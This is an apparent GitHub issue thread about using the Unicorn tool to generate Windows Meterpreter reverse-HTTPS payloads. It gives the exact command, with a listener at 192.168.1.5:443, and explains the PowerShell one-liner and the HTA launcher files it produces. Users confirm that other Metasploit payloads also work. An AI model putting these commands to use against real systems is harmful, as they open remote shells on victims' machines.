Closed r3x07 closed 5 years ago
Run the PS Example python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443
This creates two files one named powershell_attack.txt this contains the PS one liner payload, and the second file named unicorn.rc this contains the syntax for the MSF windows/meterpreter/reverse_https handler.
If you opt for the HTA Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 hta it creates a folder titled hta_attack which has three files created and stored to it, index.html, Launcher.hta and unicorn.rc, Launcher.hta contains the payload, index.html references and launches Launcher.hta, and unicorn.rc again is your MSF handler.
Wait, so it means it only works with reverse_https, but not reverse_tcp, right?
Not sure if honest, I only ever used it with reverse_https, sorry.
K
Reverse_tcp is fine as well. Any metasploit payload really.
i want to know the place my payloads are located